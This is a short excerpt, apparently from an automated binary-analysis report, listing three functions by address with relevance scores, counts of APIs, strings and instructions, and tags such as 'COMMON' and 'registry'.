Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Function 00405C13 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Function 004059FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON